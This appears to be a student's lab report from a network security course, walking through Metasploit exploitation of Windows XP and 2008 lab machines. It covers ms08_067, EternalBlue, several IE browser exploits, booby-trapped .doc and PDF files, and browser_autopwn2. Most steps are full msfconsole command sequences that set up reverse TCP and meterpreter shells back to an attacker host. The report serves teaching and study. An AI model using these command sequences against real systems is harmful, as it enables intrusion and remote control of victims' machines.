一、知识点总结

1.MSF攻击方法

主动攻击:扫描主机漏洞,进行攻击

攻击浏览器

攻击其他客户端

2.MSF的六种模块

渗透攻击模块Exploit Modules:攻击漏洞,把shellcode"背"过去

主动渗透攻击:攻击某个系统服务

被动渗透攻击:攻击某个客户端应用

辅助模块Auxiliary Modules:在进行渗透攻击之前得到目标系统丰富的情报信息,它是攻击的前提

网络服务的扫描与查点

探查敏感信息泄露、Fuzz测试发掘漏洞

收集登录密码

攻击载荷Payload Modules:载荷,一段指令(shellcode),目标系统在被渗透攻击之后去执行的代码

空字段模块Nop Modules

一些对程序运行状态不会造成任何实质影响的空操作或无关操作指令,即空指令(滑行区)

由于系统无法精确计算shellcode的起始地址,所以加入nops以增加攻击成功的概率

编码模块Encoders

改变payload形状,使得不出现特定字符

确保攻击载荷中不会出现渗透攻击过程中应加以避免的“坏字符”

后渗透攻击模块Post:攻击成功之后,动态传输代码使其在被控机执行

查看六种模块源码目录/usr/share/metasploit-framework/modules

3.MSF的三种用户操作界面

msfconsole

查看模块的具体信息info [exploits|auxiliary|post|payloads|encoders|nops]

查看设置信息show [options]

查看攻击目标类型show [target]

查找命令search

查找2016年产生的在windows平台下的漏洞search ms16 type:exploit platform:windows

启动数据库我参考了这篇博客

此次攻击的目标主动攻击的实践

ms08_067

payload/generic/shell_reverse_tcp(成功)

ms17_010_eternalblue

payload/generic/shell_reverse_tcp(成功)

攻击浏览器的实践

ms11_050(失败)

ms14_064

````payload : generic/shell_reverse_tcp(成功) ms10_002 set payload windows/meterpreter/reverse_tcp```(成功且唯一)

攻击客户端的实践

Adobe(成功)

ms11_006(失败)

成功应用任何一个辅助模块

auxiliary/server/browser_autopwn2(成功且唯一)

成功进行进程迁移

二、攻击实例

Exp5-1 实现ms08_067

靶机:Microsoft Windows XP sp3 (English)

payload : generic/shell_reverse_tcp

实验步骤

  • 使用命令msfconsole启动Metasploit终端
  • 然后使用命令search ms08_067搜索该漏洞对应的模块

  • 输入命令use exploit/windows/smb/ms08_067_netapi
  • 使用命令show targets查看渗透攻击模块可以成功渗透攻击的平台(其中我选择的是7)



    之后输入以下命令
msf exploit(ms08_067_netapi) > show payloads//查看可用的攻击载荷
msf exploit(ms08_067_netapi) > set payload generic/shell_reverse_tcp //tcp反向回连
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.238 //控制主机ip
msf exploit(ms08_067_netapi) > set LPORT 5323 //攻击端口
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.235 //靶机ip,特定漏洞端口已经固定
msf exploit(ms08_067_netapi) > set target 0 //自动选择目标系统类型,匹配度较高
msf exploit(ms08_067_netapi) > exploit //攻击



由图中看出,回连失败了,此时我将端口进行了更改,结果如下,并输入sysinfo查看靶机信息



输入ipconfig/all查看靶机ip地址

Exp5-2 实现MS17_010_eternalblue

靶机:Microsoft Windows 2008

payload : generic/shell_reverse_tcp

实验步骤

同Exp5-1类似,在终端中输入指令之后,使用命令show options 查看所配置的选项



之后输入指令exploit对靶机进行渗透攻击,如图所示,此处失败了,显示端口已被占用



将端口进行更改之后再次尝试,成功了



输入sysinfo查看靶机系统信息

Exp5-3 实现ms11_050

靶机:Microsoft Windows XP SP3 + IE8

payload : generic/shell_reverse_tcp

实验步骤

搜索漏洞search ms11_050

使用漏洞use exploit/windows/browser/ms11_050_mshtml_cobjectelement

设置靶机类型set target 3

选择攻击载荷set payload generic/shell_reverse_tcp

使用命令set SRVHOST 192.168.1.238设置地址

配置好地址后显示配置信息show options



而后exploit对此进行攻击,将产生的链接复制至靶机IE中打开,此时kali中会出现回连信息



最后失败了,当靶机打开该链接时会停止工作,链接被阻止,现在尚未想出解决方法

Exp5-4 实现ms14_064

靶机:Microsoft Windows XP SP3 + IE8

payload : generic/shell_reverse_tcp

实验步骤

首先搜索漏洞,然后使用漏洞,使用show payloads查看适用攻击载荷

选择攻击载荷set payload generic/shell_reverse_tcp

查看配置信息show options

而后通过查看配置信息添加所需选项

使用命令set SRVHOST 192.168.1.238以及 set LHOST 192.168.1.238设置地址



使用命令exploit对此进行攻击,将产生的链接复制至靶机IE中打开,此时kali中会出现回连信息

通过输入sessions -i 1获取会话连接,并输入ipconfig验证是否为靶机地址

再尝试输入shell查看结果

Exp5-5 实现ms10_002(唯一)

靶机:Microsoft Windows XP + IE8

set payload windows/meterpreter/reverse_tcp(唯一)

实验步骤

使用漏洞:use windows/browser/ms10_002_aurora

接下来的设置步骤同上一个类似,具体如下图所示



将产生的链接复制到xp中去,使用IE浏览器打开,产生回连



通过输入sessions -i 1 获取会话连接



运行run migrate尝试进行进程迁移,并输入ipconfig查看靶机IP是否一致

Exp5-6 实现ms11_006(唯一)

靶机:Microsoft Windows XP

实验步骤

使用漏洞:use windows/fileformat/ms11_006_createsizeddibsection

选择攻击载荷:set payload windows/meterpreter/reverse_tcp

设置攻击机地址及端口set LHOST 192.168.1.238 以及set LPORT 443

进行渗透攻击:exploit



此时将产生的msf.doc文件复制到xp中

在kali中输入命令use multi/handler进行监听,

然后输入配置条件,结束后输入exploit进行攻击,如下图所示



在xp中打开该文件



而后没有出现回连,失败了

我尝试输入show targets查看可攻击目标



发现选择target 0(自动)是失败的,而在target 2中的xp不兼容网上所下载的office word,需要英文版,所以还未解决这个问题

Exp5-7 实现Adobe

靶机:Windows XP sp3(English)

实验步骤

search adobe #进行查找
use windows/fileformat/adobe_cooltype_sing #使用漏洞
set payload windows/meterpreter/reverse_tcp #选择攻击载荷
set LHOST 192.168.1.238#攻击者地址
set FILENAME 20165323.pdf #设置生成pdf文件的文件名
exploit #攻击



将生成的20165323.pdf复制到Windows XP中

use exploit/multi/handler #进入监听模块
set payload windows/meterpreter/reverse_tcp #选择攻击载荷
set LHOST 192.168.1.238 #攻击者地址
exploit #攻击
```
![](https://img2018.cnblogs.com/blog/1296510/201904/1296510-20190416155436452-941203292.png)
在xp中打开此pdf文件
![](https://img2018.cnblogs.com/blog/1296510/201904/1296510-20190416155501555-1040053137.png)
回连成功
![](https://img2018.cnblogs.com/blog/1296510/201904/1296510-20190416155516620-2009309035.png)
### Exp5-8 实现辅助模块
靶机:Windows XP sp3(English)
实验步骤
``` search use auxiliary/server```查看可用的辅助模块
![](https://img2018.cnblogs.com/blog/1296510/201904/1296510-20190416160309292-1113122033.png)
使用```use auxiliary/server/browser_autopwn2 ```进入该模块
通过```info```查看该模块的功能,该模块将自动提供浏览器漏洞利用
首先输入```show options```查看需要配置的信息
![](https://img2018.cnblogs.com/blog/1296510/201904/1296510-20190416160431227-1093168501.png)
进行相应的配置
```
set payload windows/meterpreter/reverse_tcp
set SRVHOST 192.168.1.238
set URIPATH “20165323”
```
![](https://img2018.cnblogs.com/blog/1296510/201904/1296510-20190416160640405-1367757030.png)
接下来进行渗透攻击```exploit``` 并将产生的链接复制至xp中的IE浏览器进行打开
![](https://img2018.cnblogs.com/blog/1296510/201904/1296510-20190416160824846-744091638.png)
![](https://img2018.cnblogs.com/blog/1296510/201904/1296510-20190416160834365-1046039365.png)
成功了
接下来通过输入```sessions -i 2```获取会话连接,输入```dir```以及```ipconfig```进行验证是否回连成功
![](https://img2018.cnblogs.com/blog/1296510/201904/1296510-20190416161231541-1546249950.png)
![](https://img2018.cnblogs.com/blog/1296510/201904/1296510-20190416161241635-338016999.png) ## 三、实验中遇到的问题及解决方案
在使用“永恒之蓝”进行渗透攻击时,出现以下问题
![](https://img2018.cnblogs.com/blog/1296510/201904/1296510-20190416165132620-484824901.png)
解决方法:查看解释后发现端口被占用了,将端口更改后便可以进行攻击
![](https://img2018.cnblogs.com/blog/1296510/201904/1296510-20190416165248188-1730136814.png)
## 四、实验总结
1.实验总结与体会
通过本次实验,我了解了更多的攻击方法和一些漏洞的使用情况,其实漏洞哪里都有,系统、软件这些都可以存在漏洞,以前我觉得我的本机在电脑管家中有时候弹出修补漏洞没啥用,现在看来,还是好好更新吧。在这个实验中也出现了很多问题,出现了这种不能回连的怪异的情况,也学会了很多解决问题和分析问题的方法,
2.离实战还缺些什么技术
感觉大部分是按照教程来做的,离实战还很遥远
3.用自己的话解释什么是exploit,payload,encode.
```exploit```攻击者对靶机进行渗透攻击的这一过程 ```payload```类似于之前实验中的shellcode,是攻击者进行攻击的“武器” ```encode编码```改编代码,防杀软识别

2018-2019-2 20165323《网络攻防技术》Exp5 MSF基础应用的更多相关文章

  1. 2018-2019-2 20165206 网络攻防技术 Exp5 MSF基础应用

    - 2018-2019-2 20165206<网络攻防技术>Exp5 MSF基础应用 - 实验任务 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如 ...

  2. 20155226《网络攻防》 Exp5 MSF基础应用

    20155226<网络攻防> Exp5 MSF基础应用 基础问题回答 1.用自己的话解释什么是exploit,payload,encode? exploit : Exploit的英文意思就 ...

  3. 20155318 《网络攻防》Exp5 MSF基础应用

    20155318 <网络攻防>Exp5 MSF基础应用 基础问题 用自己的话解释什么是exploit,payload,encode? exploit就相当于是载具,将真正要负责攻击的代码传 ...

  4. 20145236《网络攻防》Exp5 MSF基础应用

    20145236<网络攻防>Exp5 MSF基础应用 一.基础问题回答 解释exploit,payload,encode是什么: exploit就是负责负载有用代码的交通工具,先通过exp ...

  5. 20155301 《网络攻防》 Exp5 MSF基础应用

    20155301 <网络攻防> Exp5 MSF基础应用 基础问题 1.用自己的话解释什么是exploit,payload,encode 答:exploit就是利用一些工具的,用来收集目标 ...

  6. 20155321 《网络攻防》 Exp5 MSF基础应用

    20155321 <网络攻防> Exp5 MSF基础应用 基础问题 用自己的话解释什么是exploit,payload,encode 关于exploit,我觉得exploit是利用一些工具 ...

  7. 20155338 《网络攻防》Exp5 MSF基础应用

    20155338 <网络攻防>Exp5 MSF基础应用 基础问题回答 1. 用自己的话解释什么是exploit,payload,encode? exploit将真正要负责攻击的代码传送到靶 ...

  8. 2015306 白皎 《网络攻防》Exp5 MSF基础应用

    2015306 白皎 <网络攻防>Exp5 MSF基础应用 一.基础问题 用自己的话解释什么是exploit,payload,encode. exploit指由攻击者或渗透测试者利用一个系 ...

  9. 20155334 《网络攻防》Exp5 MSF基础应用

    一.基础问题回答 解释exploit,payload,encode是什么: 项目 作用 exploit 是负载有用代码的交通工具,让代码到达目的地,并作用 payload 是有具体功能的代码,能够完成 ...

  10. 20155211 网络攻防技术 Exp08 Web基础

    20155211 网络攻防技术 Exp08 Web基础 实践内容 Web前端HTML,能正常安装.启停Apache.理解HTML,理解表单,理解GET与POST方法,编写一个含有表单的HTML. We ...

随机推荐

  1. centos7使用kubeadm安装部署kubernetes 1.14

    应用背景: 截止目前为止,高热度的kubernetes版本已经发布至1.14,在此记录一下安装部署步骤和过程中的问题排查. 部署k8s一般两种方式:kubeadm(官方称目前已经GA,可以在生产环境使 ...

  2. 稍微记录下Django2.2使用MariaDB和MySQL遇到的坑

    现在演示一下整个流程吧 1.创建项目和应用 PS:你也可以使用PyCharm直接创建项目 2.注册应用 先把刚刚创建的应用添加进去 3.配置MySQL或者MariaDB 4.PyMySQL替换默认的M ...

  3. MVN TEST指定运行脚本

    clean:表示将你上一次编译生成的一些文件删除 test:表示只执行测试代码 >mvn clean test -Dtest=[ClassName] 运行测试类中指定的方法:这个需要maven- ...

  4. finalize()与PhantomReference学习笔记

    众所周知,Java语言提供了自动垃圾回收机制,使得程序员不用考虑自己释放不再使用的内存.既然回收内存的活都让Java自己干了,程序员在这方面能干的事情就不多了.尽管如此,Java也提供了一些让程序员对 ...

  5. JavaScript传递参数方法

    1.SetTimer传递参数 setTimeout(function (obj) { obj.myScroll = new IScroll('#wrapper', { click: true }); ...

  6. Spring Cloud微服务实践之路-起始

    由于各种原因,公司要对现有的营销产品进行微服务化,如果可以,则对公司所有产品逐步进行微服务化. 而本人将探索这条路,很艰难,但干劲十足.整个过会记录下来,以便以后查阅. 感谢公司!感谢领导! 相关书籍 ...

  7. 20155324《网络对抗》Exp1 PC平台逆向破解(5)M

    20155324<网络对抗>Exp1 PC平台逆向破解(5)M 实验目标 本次实践的对象是一个名为~pwn1~的~linux~可执行文件. 该程序正常执行流程是:~main~调用~foo~ ...

  8. ASP.NET Web API 2 OData v4教程

    程序数据库格式标准化的开源数据协议 为了增强各种网页应用程序之间的数据兼容性,微软公司启动了一项旨在推广网页程序数据库格式标准化的开源数据协议(OData)计划,于此同时,他们还发 布了一款适用于OD ...

  9. JSP/Serlet 使用fileupload上传文件

    需要引用的jar commons-fileupload-1.3.1.jar commons-io-2.2.jar index.jsp <body> <center> <h ...

  10. 华南理工大学“三七互娱杯”程序设计竞赛(重现赛)( HRY and array 高精度除法模板)

    题目链接:https://ac.nowcoder.com/acm/contest/874/D 题目大意:给你两个数列a和b然后对a可以进行排列,对b可以任意排列,问你sigma(a(i)*b(i))的 ...